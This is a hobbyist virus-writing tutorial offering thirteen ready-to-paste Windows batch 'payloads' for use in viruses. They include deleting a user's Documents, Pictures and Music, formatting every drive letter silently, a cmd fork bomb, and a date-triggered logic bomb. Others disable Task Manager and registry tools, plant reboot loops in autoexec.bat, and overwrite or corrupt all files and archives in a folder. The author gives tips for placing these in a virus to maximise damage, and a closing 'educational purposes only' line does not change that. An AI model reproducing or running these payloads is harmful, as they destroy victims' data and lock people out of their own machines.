+ + TUTORIAL: AwEsOmE BaTcH PaYlOaDs by + cOrRuPt G3n3t!x + Welcome to my 6th tutorial, we have discussed many things in my last 5 such as Polymorhism, Spreading, Satrtup Methods, Anti AV Techniques and even a Theory on Batch Keylogging! Today i would like to discuss some possible payloads in batch; things such as keyboard disable and mouse disable cannot be used any more because it does not support vista any more, but read on further i might just have came up with a new technique ;) I will admit, i'm not really into destructive payloads such as formatting C:\ drives etc i just dont like 'em but, i will be putting my dislikes aside and show you all great methods i know and/or have seen in practice. 1)Random Directory Maker (RDM): ---------------------------- This will make random folders in the current directory, you can minipulate it by giving a path before the random part to make it go to a specific path!: -------------------------------[Cut Here]-------------------------------------- @echo off md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% -------------------------------[Cut Here]-------------------------------------- 2)User Specific Deletion (USD): ---------------------------- This method will delete the users Documents, Pictures, Videos, Music and Downloads in a Windows Vista System; It can be changed to do the same for XP: -------------------------------[Cut Here]-------------------------------------- @echo off DEL /F /Q %UserProfile%\Documents\*.* >nul DEL /F /Q %UserProfile%\Pictures\*.* >nul DEL /F /Q %UserProfile%\Videos\*.* >nul DEL /F /Q %UserProfile%\Downloads\*.* >nul DEL /F /Q %UserProfile%\Music\*.* >nul -------------------------------[Cut Here]-------------------------------------- 3)Windows CrAsh/FreEzE: -------------------- This is the age old method of starting up windows CMD.exe in a loop and slow the computer down to a halt! all it will do is call up CMD.exe in a loop, my computer never crashed but i could not operate it and had to reset (if this is considered a virus\payload its the smallest i've ever seen 17bytes to be exact): -------------------------------[Cut Here]-------------------------------------- :a start goto a -------------------------------[Cut Here]-------------------------------------- 4)Formating: --------- This will delete all data on backup and shared drives, however it will not format the drive running windows! You can change the system type from NTFS to UDF.. etc just type 'Format /?' in CMD.exe for more info(although most new HDD's use NTFS): -------------------------------[Cut Here]-------------------------------------- @echo off FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul FORMAT Z: /FS:NTFS /V:(Z:) /X /P:1 /y >nul FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul FORMAT K: /FS:NTFS /V:(L:) /X /P:1 /y >nul FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul FORMAT Q: /FS:NTFS /V:(Q:) /X /P:1 /y >nul FORMAT R: /FS:NTFS /V:(R:) /X /P:1 /y >nul FORMAT S: /FS:NTFS /V:(S:) /X /P:1 /y >nul FORMAT T: /FS:NTFS /V:(T:) /X /P:1 /y >nul FORMAT U: /FS:NTFS /V:(U:) /X /P:1 /y >nul FORMAT V: /FS:NTFS /V:(V:) /X /P:1 /y >nul FORMAT W: /FS:NTFS /V:(W:) /X /P:1 /y >nul FORMAT X: /FS:NTFS /V:(Y:) /X /P:1 /y >nul FORMAT Z: /FS:NTFS /V:(Z:) /X /P:1 /y >nul -------------------------------[Cut Here]-------------------------------------- Next we will look at formating USB's and D: drives Although i will give all the possible locations of the USB and D drives, it is very unlikely they'll be found anywhere else on other pc's as usually, D: is D and E.F,G and H are USB, C:, Z: etc are Drives take that into account before just adding all the code to it!!: -------------------------------[Cut Here]-------------------------------------- format A: /y >nul format B: /y >nul format C: /y >nul format D: /y >nul format E: /y >nul format F: /y >nul format G: /y >nul format H: /y >nul format I: /y >nul format J: /y >nul format K: /y >nul format L: /y >nul format M: /y >nul format N: /y >nul format O: /y >nul format P: /y >nul format Q: /y >nul format R: /y >nul format S: /y >nul format T: /y >nul format U: /y >nul format V: /y >nul format W: /y >nul format X: /y >nul format Y: /y >nul format Z: /y >nul -------------------------------[Cut Here]-------------------------------------- It is important to note that it does take a few minutes to format USB's, D: drives etc, so it woukd be clever to put the formatting at the end of your virus routine, because even if it just starts formatting and the user cancels it; the disk, drive or USB will still need to be formatted properly before it can be used. You could also make a sort of logic bomb that will set the computer to format on a given day and month, see below: -------------------------------[Cut Here]-------------------------------------- If %date% NEQ 2009/08/14 goto exit format E: /y >nul :exit exit -------------------------------[Cut Here]-------------------------------------- 5)Disable RegisteryTools and Taskmnger.exe: ----------------------------------------- This is an extremely annoying payload, once activated the user will not be able to acess any Reg tools such as REGEDIT.exe and this includes others among them CMD.exe and Taskmangr.exe! This also means no batch, script or .reg program can run!!! So it is important to not activate this until your virus has done its job; this is perfect for self destructing virii, as it can disable these tools when it deletes itself from the users system: -------------------------------[Cut Here]-------------------------------------- reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f -------------------------------[Cut Here]-------------------------------------- 6)Swap Mouse Buttons (SMB): ------------------------ This method was used alot in older Windows, but now with vista it does not work anymore, i have however found another method via the registery just remember a restart is required to take effect: -------------------------------[Cut Here]-------------------------------------- REG ADD "HKU\S-1-5-21-3199511022-2964655342-1435898374-1000\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f -------------------------------[Cut Here]-------------------------------------- I have just figured out after 15 minutes if a reg key has a space in its name such as the above use quotation marks ( "reg key value" ) ;[! 7)Time & Date Changer: ------------------- This, as the name suggest, will change the time and date of the computer on every start up: -------------------------------[Cut Here]-------------------------------------- attrib -r -h C:\autoexec.bat echo.Time 00:00:00>>C:\autoexec.bat echo.Date 45/04/11>>C:\autoexec.bat attrib +r +h C:\autoexec.bat -------------------------------[Cut Here]-------------------------------------- 8)Windows Restart Loop: -------------------- This will set the users PC in a restart loop. Changing /t 02 to /t 00 will make an immediate shutdown where as /t 02 will wait 2 seconds before shut down. Type 'shutdown /?' in CMD.exe for more information: -------------------------------[Cut Here]-------------------------------------- attrib -r -h C:\autoexec.bat echo.shutdown -r /t 02 /c "You are infected with a virus!!">>C:\autoexec.bat attrib +r +h C:\autoexec.bat -------------------------------[Cut Here]-------------------------------------- 9)Internal Clock Overwrite (ICO): ------------------------------ PLEASE DO NOT TEST ON YOUR PC!! I HAVE NOT TESTED ON MINE BUT SHOULD WORK, I WILL NOT BE RESPONSIBLE FOR ANY USER STUPIDITY!!!!!! and a big thanks to Dvl for this. This will overwrite your internal dos variable clock$ and will then crash the users computer with a stack overflow. When PC reboots depending on the bios you are using the bios will be filled with garbage on other bioses it will only affect the date and time! There are all sorts of internal variables that you can overwrite with the echo command. To get a list of these commands type 'mem /d': -------------------------------[Cut Here]-------------------------------------- Echo 123>clock$ -------------------------------[Cut Here]-------------------------------------- I have also provided a few other ones: -------------------------------[Cut Here]-------------------------------------- echo 123>CON echo 123>AUX echo 123>PRN echo 123>COM1 echo 123>COM2 echo 123>COM3 echo 123>COM4 -------------------------------[Cut Here]-------------------------------------- 10)File Execution: -------------- This will open up, images, websites, mp3's and anything else you want, just change the name and location of your specific file(Inspired by Dvl's method): -------------------------------[Cut Here]-------------------------------------- explorer.exe C:\pic.jpg explorer.exe C:\Immortal_technique.mp3 explorer.exe http://pornhub.com -------------------------------[Cut Here]-------------------------------------- 11)BAT/Silly.D Virus revamp: ------------------------ We all know this simple dos virus but now i have taken it a step further it will overwrite all files and make them unusable(another thanx to Dvl: -------------------------------[Cut Here]-------------------------------------- echo.fUcK tHe SySt3m>>%Temp%\FTS.tmp for %%a in (*.*) do copy %temp%\FTS.tmp %%a >nul -------------------------------[Cut Here]-------------------------------------- 12)Payload Activation Technique (PAT): ---------------------------------- This will show you how to let your paylaod activate on a certain date or if parameters are met in the example below it will check if the current date is equal to the date i set if not it will exit if it is it will run the code: -------------------------------[Cut Here]-------------------------------------- If %date% NEQ 2009/08/14 goto exit "Your virus payload here" :exit exit -------------------------------[Cut Here]-------------------------------------- 13)File Compression Corruption: --------------------------- This is my very own technique that gels extremely well with my name (cOrRuPt G3n3t!x) haha, and now i'ma teach you how to corrupt all types of compressed files (.zip, .7z, .rar etc) it is extremely simple though as it works on the basis that i copy an uncompressed file straight into a compressed file, thus windows will not be able to extract it and it will display a message similiar to 'This file is corrupted': -------------------------------[Cut Here]-------------------------------------- echo.corrupt compressed files now!!!>>%temp%\cg.tmp for %%a in (*.zip *.7z *.tar *.rar *gz *.bz2) do set a=%%a copy %temp%\cg.tmp %a% >nul del %temp%\cg.tmp -------------------------------[Cut Here]-------------------------------------- Well you've come to the end of my next tutorial, some techniques i've showed here are kinda new, so have fun if you have any queries or problems you need help with (I'm talking about batch problems not personal :)) then drop me some mail! PS. This is for educational purposes only! Do not distrubute with intention to do harm! Now Batch Up !!!!! ;) [?]Contact Me: ----------- [@]immortalassassin@rocketmail.com